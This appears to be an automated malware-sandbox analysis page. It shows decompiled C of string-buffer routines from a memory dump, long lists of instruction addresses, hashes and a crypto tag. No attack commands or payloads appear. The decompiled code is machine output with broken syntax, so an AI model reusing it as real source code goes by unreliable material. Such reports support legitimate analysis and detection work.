							while( *((char*)(_t521 + _t395)) != 0) {
								_t521 = _t521 + 1;
								if(_t521 < _t381) {
									continue;
								} else {
									goto L51;
								}
								goto L58;
							}
							L245:
							if(_t521 == 0xfffffffe) {
								 *_t395 = 0;
							}
						}
					}
					L58:
					_t332 =  <=  ? 0x40 : _t521 + 2;
					if(_t332 > _v40) {
						_v60 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
						_t333 = _t332 & 0x8000003f;
						if(_t333 < 0) {
							_t333 = (_t333 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t336 = _v60 + (0 | _t333 > 0x00000000) << 6;
						_v60 = _t336;
						_push(_t336);
						_t267 = E6EA01030();
						_t552 = _t552 + 4;
						_t332 = _v44;
						if(_t332 == 0) {
							 *_t267 = 0;
						} else {
							if(_t267 != 0) {
								_t478 =  *_t332;
								 *_t267 = _t478;
								if(_t478 != 0) {
									_v24 = _t306;
									_t317 = 0;
									_v68 = _t496;
									while(1) {
										_t317 = _t317 + 1;
										_t480 =  *((char*)(_t332 + _t317 * 2 - 1));
										 *((char*)(_t267 + _t317 * 2 - 1)) = _t480;
										if(_t480 == 0) {
											break;
										}
										_t481 =  *((char*)(_t332 + _t317 * 2));
										 *((char*)(_t267 + _t317 * 2)) = _t481;
										if(_t481 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
								}
							}
							_push(1);
							_push(_t332);
							_v64 = _t267;
							E6EA010B0();
							_t267 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t267;
					} else {
						_t267 = _v44;
					}
					 *((char*)(_t267 + _t521)) = 0x30;
					 *((char*)(_t521 + _v44 + 1)) = 0;
					_t268 = _v44;
					if(_t268 == 0) {
						_t522 = 0;
					} else {
						_t476 = _t268 & 0x0000000f;
						if(_t476 == 0) {
							L77:
							asm("pxor xmm0, xmm0");
							_t537 =  ~( ~_t476 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t332 != 0) {
									break;
								}
								_t476 = _t476 + 0x10;
								if(_t476 < _t537) {
									continue;
								} else {
									if(_t537 >= 0x7fffffff) {
										L83:
										_t522 = 0x7fffffff;
									} else {
										while( *((char*)(_t537 + _t268)) != 0) {
											_t537 = _t537 + 1;
											if(_t537 < 0x7fffffff) {
												continue;
											} else {
												goto L83;
											}
											goto L84;
										}
										goto L241;
									}
								}
								goto L84;
							}
							asm("bsf esi, ecx");
							_t522 = _t537 + _t476;
							goto L241;
						} else {
							_t522 = 0;
							_t476 =  ~_t476 + 0x10;
							while( *((char*)(_t522 + _t268)) != 0) {
								_t522 = _t522 + 1;
								if(_t522 < _t476) {
									continue;
								} else {
									goto L77;
								}
								goto L84;
							}
							L241:
							if(_t522 == 0xfffffffe) {
								 *_t268 = 0;
							}
						}
					}
					L84:
					_t330 = 0x40;
					_t407 =  <=  ? 0x40 : _t522 + 2;
					if(_t407 > _v40) {
						_t375 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
						_v60 = _t375;
						_t465 = _t407 & 0x8000003f;
						if(_t465 < 0) {
							_t465 = (_t465 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t377 = _t375 + (0 | _t465 > 0x00000000) << 6;
						_v60 = _t377;
						_push(_t377);
						_t268 = E6EA01030();
						_t552 = _t552 + 4;
						_t330 = _v44;
						if(_t330 == 0) {
							 *_t268 = 0;
						} else {
							if(_t268 != 0) {
								_t469 =  *_t330;
								 *_t268 = _t469;
								if(_t469 != 0) {
									_v24 = _t306;
									_t316 = 0;
									_v68 = _t496;
									while(1) {
										_t316 = _t316 + 1;
										_t471 =  *((char*)(_t330 + _t316 * 2 - 1));
										 *((char*)(_t268 + _t316 * 2 - 1)) = _t471;
										if(_t471 == 0) {
											break;
										}
										_t472 =  *((char*)(_t330 + _t316 * 2));
										 *((char*)(_t268 + _t316 * 2)) = _t472;
										if(_t472 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
									_t330 = _v44;
								}
							}
							_push(1);
							_push(_t330);
							_v64 = _t268;
							E6EA010B0();
							_t268 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t268;
					}
					 *((char*)(_t268 + _t522)) = 0x2a;
					 *((char*)(_t268 + _t522 + 1)) = 0;
				} else {
					_t268 = _v44;
				}
				if(_t268 == 0) {
					_t523 = 0;
				} else {
					_t463 = _t268 & 0x0000000f;
					if(_t463 == 0) {
						L103:
						asm("pxor xmm0, xmm0");
						_t531 =  ~( ~_t463 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [eax+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t330 != 0) {
								break;
							}
							_t463 = _t463 + 0x10;
							if(_t463 < _t531) {
								continue;
							} else {
								if(_t531 >= 0x7fffffff) {
									L109:
									_t523 = 0x7fffffff;
								} else {
									while( *((char*)(_t531 + _t268)) != 0) {
										_t531 = _t531 + 1;
										if(_t531 < 0x7fffffff) {
											continue;
										} else {
											goto L109;
										}
										goto L110;
									}
									goto L237;
								}
							}
							goto L110;
						}
						asm("bsf esi, ecx");
						_t523 = _t531 + _t463;
						goto L237;
					} else {
						_t523 = 0;
						_t463 =  ~_t463 + 0x10;
						while( *((char*)(_t523 + _t268)) != 0) {
							_t523 = _t523 + 1;
							if(_t523 < _t463) {
								continue;
							} else {
								goto L103;
							}
							goto L110;
						}
						L237:
						if(_t523 == 0xfffffffe) {
							 *_t268 = 0;
						}
					}
				}
				L110:
				_t338 =  <=  ? 0x40 : _t523 + 2;
				if(_t338 > _v40) {
					_v64 = (_t338 >> 5 >> 0x1a) + _t338 >> 6;
					_t339 = _t338 & 0x8000003f;
					if(_t339 < 0) {
						_t339 = (_t339 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t342 = _v64 + (0 | _t339 > 0x00000000) << 6;
					_v64 = _t342;
					_push(_t342);
					_t269 = E6EA01030();
					_t552 = _t552 + 4;
					_t343 = _v44;
					if(_t343 == 0) {
						 *_t269 = 0;
					} else {
						if(_t269 != 0) {
							_t458 =  *_t343;
							 *_t269 = _t458;
							if(_t458 != 0) {
								_v24 = _t306;
								_t315 = 0;
								_v68 = _t496;
								while(1) {
									_t315 = _t315 + 1;
									_t460 =  *((char*)(_t343 + _t315 * 2 - 1));
									 *((char*)(_t269 + _t315 * 2 - 1)) = _t460;
									if(_t460 == 0) {
										break;
									}
									_t461 =  *((char*)(_t343 + _t315 * 2));
									 *((char*)(_t269 + _t315 * 2)) = _t461;
									if(_t461 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t343);
						_v68 = _t269;
						E6EA010B0();
						_t269 = _v68;
						_t552 = _t552 + 8;
					}
					_v40 = _v64;
					_v44 = _t269;
				} else {
					_t269 = _v44;
				}
				goto L124;
			}

0x6ea162fc
0x6ea162fe
0x6ea16300
0x6ea16304
0x6ea16306
0x6ea1630e
0x6ea16310
0x6ea16313
0x6ea16317
0x6ea16354
0x6ea16319
0x6ea1631b
0x6ea1631d
0x6ea16320
0x6ea16324
0x6ea16326
0x6ea16329
0x6ea1632b
0x6ea1632b
0x6ea1632c
0x6ea16331
0x6ea16337
0x00000000
0x00000000
0x6ea16339
0x6ea1633d
0x6ea16342
0x00000000
0x00000000
0x00000000
0x6ea16342
0x6ea16344
0x6ea16344
0x6ea16324
0x6ea16347
0x6ea16349
0x6ea1634a
0x6ea1634f
0x6ea1634f
0x6ea1635c
0x6ea16364
0x6ea16365
0x6ea16367
0x6ea1636a
0x6ea1636f
0x6ea16372
0x6ea16378
0x6ea163d5
0x6ea163d8
0x6ea163e0
0x6ea163e4
0x6ea163e6
0x6ea163e9
0x6ea16401
0x6ea16405
0x6ea16411
0x6ea16417
0x6ea16417
0x6ea1641c
0x6ea16420
0x6ea16426
0x00000000
0x00000000
0x6ea1642c
0x6ea16431
0x00000000
0x6ea16433
0x6ea16439
0x6ea1644e
0x6ea1644e
0x00000000
0x6ea1643b
0x6ea1643b
0x6ea16445
0x6ea1644c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea1644c
0x00000000
0x6ea1643b
0x6ea16439
0x00000000
0x6ea16431
0x6ea16eb0
0x6ea16eb3
0x00000000
0x6ea163eb
0x6ea163ed
0x6ea163ef
0x6ea163f2
0x6ea163fc
0x6ea163ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea163ff
0x6ea16e93
0x6ea16e96
0x00000000
0x6ea16ea4
0x6ea16ea4
0x6ea16ea7
0x00000000
0x6ea16ea7
0x6ea168ea
0x6ea168ea
0x6ea168ee
0x6ea168f6
0x6ea168fb
0x6ea16b4d
0x6ea16b51
0x6ea16b55
0x6ea16b59
0x6ea16b63
0x6ea16b65
0x6ea16b6d
0x6ea16b7d
0x6ea16b84
0x6ea16baf
0x6ea16bb5
0x6ea16d25
0x6ea16d29
0x6ea16d2b
0x6ea16d2b
0x6ea16d32
0x6ea16d34
0x6ea16d3b
0x6ea16d3d
0x6ea16d40
0x6ea16d44
0x6ea16d83
0x6ea16d46
0x6ea16d48
0x6ea16d4a
0x6ea16d4d
0x6ea16d51
0x6ea16d53
0x6ea16d57
0x6ea16d59
0x6ea16d59
0x6ea16d5a
0x6ea16d5f
0x6ea16d65
0x00000000
0x00000000
0x6ea16d67
0x6ea16d6b
0x6ea16d70
0x00000000
0x00000000
0x00000000
0x6ea16d70
0x6ea16d72
0x6ea16d72
0x6ea16d51
0x6ea16d76
0x6ea16d78
0x6ea16d79
0x6ea16d7e
0x6ea16d7e
0x00000000
0x6ea16d44
0x6ea16bc4
0x6ea16bc6
0x6ea16bc9
0x6ea16be1
0x6ea16be5
0x6ea16bf1
0x6ea16bf7
0x6ea16bf7
0x6ea16bfc
0x6ea16c00
0x6ea16c06
0x00000000
0x00000000
0x6ea16c0c
0x6ea16c11
0x00000000
0x6ea16c13
0x6ea16c19
0x6ea16c2e
0x6ea16c2e
0x6ea16c1b
0x6ea16c1b
0x6ea16c25
0x6ea16c2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea16c2c
0x00000000
0x6ea16c1b
0x6ea16c19
0x00000000
0x6ea16c11
0x6ea16e2f
0x6ea16e32
0x00000000
0x6ea16bcb
0x6ea16bcd
0x6ea16bcf
0x6ea16bd2
0x6ea16bdc
0x6ea16bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea16bdf
0x6ea16e14
0x6ea16e17
0x6ea16e1d
0x6ea16e21
0x6ea16e27
0x6ea16e27
0x6ea16e21
0x6ea16e17
0x6ea16c33
0x6ea16c38
0x6ea16c3e
0x6ea16c44
0x6ea16c5a
0x6ea16c5e
0x6ea16c64
0x6ea16c6c
0x6ea16c6c
0x6ea16c7a
0x6ea16c7d
0x6ea16c81
0x6ea16c87
0x6ea16c89
0x6ea16c8c
0x6ea16c90
0x6ea16cdf
0x6ea16c92
0x6ea16c94
0x6ea16c96
0x6ea16c99
0x6ea16c9d
0x6ea16ca1
0x6ea16ca4
0x6ea16ca8
0x6ea16caa
0x6ea16caa
0x6ea16cab
0x6ea16cb0
0x6ea16cb6
0x00000000
0x00000000
0x6ea16cb8
0x6ea16cbc
0x6ea16cc1
0x00000000
0x00000000
0x00000000
0x6ea16cc1
0x6ea16cc3
0x6ea16cc6
0x6ea16cc6
0x6ea16c9d
0x6ea16cca
0x6ea16ccc
0x6ea16ccd
0x6ea16cd1
0x6ea16cd6
0x6ea16cda
0x6ea16cda
0x6ea16ce6
0x6ea16ce9
0x6ea16c46
0x6ea16c46
0x6ea16c46
0x6ea16ceb
0x6ea16cef
0x6ea16cfd
0x6ea16d01
0x6ea16d03
0x6ea16d09
0x6ea16d09
0x6ea16d0c
0x6ea16d0d
0x6ea16d11
0x00000000
0x00000000
0x6ea16d1d
0x00000000
0x6ea16d23
0x6ea16d07
0x6ea16d08
0x00000000
0x6ea16d08
0x00000000
0x6ea16d1d
0x00000000
0x6ea16d09
0x6ea16cef
0x00000000
0x6ea16b86
0x6ea16b8a
0x6ea16b8b
0x6ea16b8c
0x6ea16b8d
0x6ea16b8e
0x6ea16b8f
0x6ea16b8f
0x6ea16901
0x6ea16901
0x6ea16905
0x6ea16908
0x6ea1690c
0x6ea16910
0x6ea16914
0x6ea1691e
0x6ea16920
0x6ea16928
0x6ea16938
0x6ea1693f
0x6ea1696a
0x6ea16970
0x6ea16ae0
0x6ea16ae4
0x6ea16ae6
0x6ea16ae6
0x6ea16aed
0x6ea16af3
0x6ea16afa
0x6ea16afc
0x6ea16aff
0x6ea16b03
0x6ea16b45
0x6ea16b05
0x6ea16b07
0x6ea16b09
0x6ea16b0c
0x6ea16b10
0x6ea16b12
0x6ea16b16
0x6ea16b18
0x6ea16b18
0x6ea16b19
0x6ea16b1e
0x6ea16b24
0x00000000
0x00000000
0x6ea16b26
0x6ea16b2a
0x6ea16b2f
0x00000000
0x00000000
0x00000000
0x6ea16b2f
0x6ea16b31
0x6ea16b31
0x6ea16b10
0x6ea16b35
0x6ea16b37
0x6ea16b38
0x6ea16b3d
0x6ea16b3d
0x6ea16d86
0x6ea16d86
0x6ea16d88
0x6ea16d88
0x6ea1697f
0x6ea16981
0x6ea16984
0x6ea1699c
0x6ea169a0
0x6ea169ac
0x6ea169b2
0x6ea169b2
0x6ea169b7
0x6ea169bb
0x6ea169c1
0x00000000
0x00000000
0x6ea169c7
0x6ea169cc
0x00000000
0x6ea169ce
0x6ea169d4
0x6ea169e9
0x6ea169e9
0x6ea169d6
0x6ea169d6
0x6ea169e0
0x6ea169e7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea169e7
0x00000000
0x6ea169d6
0x6ea169d4
0x00000000
0x6ea169cc
0x6ea16e0d
0x6ea16e10
0x00000000
0x6ea16986
0x6ea16988
0x6ea1698a
0x6ea1698d
0x6ea16997
0x6ea1699a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea1699a
0x6ea16df2
0x6ea16df5
0x6ea16dfb
0x6ea16dff
0x6ea16e05
0x6ea16e05
0x6ea16dff
0x6ea16df5
0x6ea169ee
0x6ea169f3
0x6ea169f9
0x6ea169ff
0x6ea16a15
0x6ea16a19
0x6ea16a1f
0x6ea16a27
0x6ea16a27
0x6ea16a35
0x6ea16a38
0x6ea16a3c
0x6ea16a42
0x6ea16a44
0x6ea16a47
0x6ea16a4b
0x6ea16a9a
0x6ea16a4d
0x6ea16a4f
0x6ea16a51
0x6ea16a54
0x6ea16a58
0x6ea16a5c
0x6ea16a5f
0x6ea16a63
0x6ea16a65
0x6ea16a65
0x6ea16a66
0x6ea16a6b
0x6ea16a71
0x00000000
0x00000000
0x6ea16a73
0x6ea16a77
0x6ea16a7c
0x00000000
0x00000000
0x00000000
0x6ea16a7c
0x6ea16a7e
0x6ea16a81
0x6ea16a81
0x6ea16a58
0x6ea16a85
0x6ea16a87
0x6ea16a88
0x6ea16a8c
0x6ea16a91
0x6ea16a95
0x6ea16a95
0x6ea16aa1
0x6ea16aa4
0x6ea16a01
0x6ea16a01
0x6ea16a01
0x6ea16aa6
0x6ea16aaa
0x6ea16ab8
0x6ea16abc
0x6ea16abe
0x6ea16ac4
0x6ea16ac4
0x6ea16ac7
0x6ea16ac8
0x6ea16acc
0x00000000
0x00000000
0x6ea16ad8
0x6ea16dec
0x6ea16dec
0x6ea16ade
0x6ea16ac2
0x6ea16ac3
0x00000000
0x6ea16ac3
0x00000000
0x6ea16ad8
0x6ea16de2
0x6ea16de2
0x6ea16de6
0x6ea16de6
0x6ea16aaa
0x6ea16d8f
0x6ea16d8f
0x6ea16d91
0x6ea16d92
0x6ea16d9a
0x6ea16d9c
0x6ea16da0
0x6ea16dac
0x6ea16db0
0x6ea16dbd
0x6ea16941
0x6ea16945
0x6ea16946
0x6ea16947
0x6ea16948
0x6ea16949
0x6ea1694a
0x6ea1694a
0x6ea1693f
0x6ea168fb
0x6ea1637a
0x6ea1637c
0x6ea16dc0
0x6ea16dc2
0x6ea16dc3
0x6ea16dc8
0x6ea16dcb
0x6ea16dd3
0x6ea16dd5
0x6ea16453
0x6ea16453
0x6ea16382
0x6ea16382
0x6ea16385
0x6ea16389
0x6ea1638b
0x6ea16393
0x6ea16395
0x6ea16398
0x6ea16398
0x6ea16399
0x6ea1639e
0x6ea163a4
0x00000000
0x00000000
0x6ea163a6
0x6ea163aa
0x6ea163af
0x00000000
0x00000000
0x00000000
0x6ea163af
0x6ea163b1
0x6ea163b1
0x6ea163b4
0x6ea163b6
0x6ea163b7
0x6ea163bb
0x6ea163c0
0x6ea163c4
0x6ea163c7
0x6ea163cf
0x00000000
0x6ea163cf
0x6ea1637c
0x6ea16458
0x6ea1645d
0x6ea16463
0x6ea16468
0x6ea1647d
0x6ea16480
0x6ea16484
0x6ea1648a
0x6ea16492
0x6ea16492
0x6ea1649f
0x6ea164a2
0x6ea164a6
0x6ea164a7
0x6ea164ac
0x6ea164af
0x6ea164b5
0x6ea16504
0x6ea164b7
0x6ea164b9
0x6ea164bb
0x6ea164be
0x6ea164c2
0x6ea164c6
0x6ea164ca
0x6ea164cc
0x6ea164cf
0x6ea164cf
0x6ea164d0
0x6ea164d5
0x6ea164db
0x00000000
0x00000000
0x6ea164dd
0x6ea164e1
0x6ea164e6
0x00000000
0x00000000
0x00000000
0x6ea164e6
0x6ea164e8
0x6ea164ec
0x6ea164ec
0x6ea164c2
0x6ea164ef
0x6ea164f1
0x6ea164f2
0x6ea164f6
0x6ea164fb
0x6ea164ff
0x6ea164ff
0x6ea1650b
0x6ea1650f
0x6ea1646a
0x6ea1646a
0x6ea1646a
0x6ea16513
0x6ea1651f
0x6ea16524
0x6ea1652f
0x6ea16535
0x6ea16e8c
0x6ea1653b
0x6ea1653d
0x6ea16540
0x6ea16558
0x6ea1655c
0x6ea16568
0x6ea1656e
0x6ea1656e
0x6ea16573
0x6ea16577
0x6ea1657d
0x00000000
0x00000000
0x6ea16583
0x6ea16588
0x00000000
0x6ea1658a
0x6ea16590
0x6ea165a5
0x6ea165a5
0x6ea16592
0x6ea16592
0x6ea1659c
0x6ea165a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea165a3
0x00000000
0x6ea16592
0x6ea16590
0x00000000
0x6ea16588
0x6ea16e85
0x6ea16e88
0x00000000
0x6ea16542
0x6ea16544
0x6ea16546
0x6ea16549
0x6ea16553
0x6ea16556
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea16556
0x6ea16e74
0x6ea16e77
0x6ea16e7d
0x6ea16e7d
0x6ea16e77
0x6ea16540
0x6ea165aa
0x6ea165b5
0x6ea165bc
0x6ea165d4
0x6ea165d8
0x6ea165de
0x6ea165e6
0x6ea165e6
0x6ea165f4
0x6ea165f7
0x6ea165fb
0x6ea165fc
0x6ea16601
0x6ea16604
0x6ea1660a
0x6ea16659
0x6ea1660c
0x6ea1660e
0x6ea16610
0x6ea16613
0x6ea16617
0x6ea1661b
0x6ea1661f
0x6ea16621
0x6ea16624
0x6ea16624
0x6ea16625
0x6ea1662a
0x6ea16630
0x00000000
0x00000000
0x6ea16632
0x6ea16636
0x6ea1663b
0x00000000
0x00000000
0x00000000
0x6ea1663b
0x6ea1663d
0x6ea16641
0x6ea16641
0x6ea16617
0x6ea16644
0x6ea16646
0x6ea16647
0x6ea1664b
0x6ea16650
0x6ea16654
0x6ea16654
0x6ea16660
0x6ea16664
0x6ea165be
0x6ea165be
0x6ea165be
0x6ea16668
0x6ea16670
0x6ea16675
0x6ea1667b
0x6ea16e6d
0x6ea16681
0x6ea16683
0x6ea16686
0x6ea1669e
0x6ea166a2
0x6ea166ae
0x6ea166b4
0x6ea166b4
0x6ea166b9
0x6ea166bd
0x6ea166c3
0x00000000
0x00000000
0x6ea166c9
0x6ea166ce
0x00000000
0x6ea166d0
0x6ea166d6
0x6ea166eb
0x6ea166eb
0x6ea166d8
0x6ea166d8
0x6ea166e2
0x6ea166e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea166e9
0x00000000
0x6ea166d8
0x6ea166d6
0x00000000
0x6ea166ce
0x6ea16e66
0x6ea16e69
0x00000000
0x6ea16688
0x6ea1668a
0x6ea1668c
0x6ea1668f
0x6ea16699
0x6ea1669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea1669c
0x6ea16e55
0x6ea16e58
0x6ea16e5e
0x6ea16e5e
0x6ea16e58
0x6ea16686
0x6ea166f0
0x6ea166f0
0x6ea166fb
0x6ea16702
0x6ea16712
0x6ea16715
0x6ea16719
0x6ea1671f
0x6ea16727
0x6ea16727
0x6ea16734
0x6ea16737
0x6ea1673b
0x6ea1673c
0x6ea16741
0x6ea16744
0x6ea1674a
0x6ea1679d
0x6ea1674c
0x6ea1674e
0x6ea16750
0x6ea16753
0x6ea16757
0x6ea1675b
0x6ea1675f
0x6ea16761
0x6ea16764
0x6ea16764
0x6ea16765
0x6ea1676a
0x6ea16770
0x00000000
0x00000000
0x6ea16772
0x6ea16776
0x6ea1677b
0x00000000
0x00000000
0x00000000
0x6ea1677b
0x6ea1677d
0x6ea16781
0x6ea16784
0x6ea16784
0x6ea16757
0x6ea16788
0x6ea1678a
0x6ea1678b
0x6ea1678f
0x6ea16794
0x6ea16798
0x6ea16798
0x6ea167a4
0x6ea167a8
0x6ea167a8
0x6ea167ac
0x6ea167b0
0x6ea16526
0x6ea16526
0x6ea16526
0x6ea167b7
0x6ea16e4e
0x6ea167bd
0x6ea167bf
0x6ea167c2
0x6ea167da
0x6ea167de
0x6ea167ea
0x6ea167f0
0x6ea167f0
0x6ea167f5
0x6ea167f9
0x6ea167ff
0x00000000
0x00000000
0x6ea16805
0x6ea1680a
0x00000000
0x6ea1680c
0x6ea16812
0x6ea16827
0x6ea16827
0x6ea16814
0x6ea16814
0x6ea1681e
0x6ea16825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea16825
0x00000000
0x6ea16814
0x6ea16812
0x00000000
0x6ea1680a
0x6ea16e47
0x6ea16e4a
0x00000000
0x6ea167c4
0x6ea167c6
0x6ea167c8
0x6ea167cb
0x6ea167d5
0x6ea167d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea167d8
0x6ea16e36
0x6ea16e39
0x6ea16e3f
0x6ea16e3f
0x6ea16e39
0x6ea167c2
0x6ea1682c
0x6ea16837
0x6ea1683e
0x6ea16856
0x6ea1685a
0x6ea16860
0x6ea16868
0x6ea16868
0x6ea16876
0x6ea16879
0x6ea1687d
0x6ea1687e
0x6ea16883
0x6ea16886
0x6ea1688c
0x6ea168db
0x6ea1688e
0x6ea16890
0x6ea16892
0x6ea16895
0x6ea16899
0x6ea1689d
0x6ea168a1
0x6ea168a3
0x6ea168a6
0x6ea168a6
0x6ea168a7
0x6ea168ac
0x6ea168b2
0x00000000
0x00000000
0x6ea168b4
0x6ea168b8
0x6ea168bd
0x00000000
0x00000000
0x00000000
0x6ea168bd
0x6ea168bf
0x6ea168c3
0x6ea168c3
0x6ea16899
0x6ea168c6
0x6ea168c8
0x6ea168c9
0x6ea168cd
0x6ea168d2
0x6ea168d6
0x6ea168d6
0x6ea168e2
0x6ea168e6
0x6ea16840
0x6ea16840
0x6ea16840
0x00000000

Strings

@, xrefs: 6EA16DCB

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction ID: 386f83865d669d0a1b7468446e52ebfb830123ceced2defb8d62c121f479b496
Opcode Fuzzy Hash: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction Fuzzy Hash: FC725C7091C7524FE319CE69C4A03AA7AE26FC6344F2DC76CD8A58B395DA35CC81C786

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EA0C590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E6EA01030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E6EA01030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E6EA010B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E6EA01030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E6EA010B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E6EA010B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
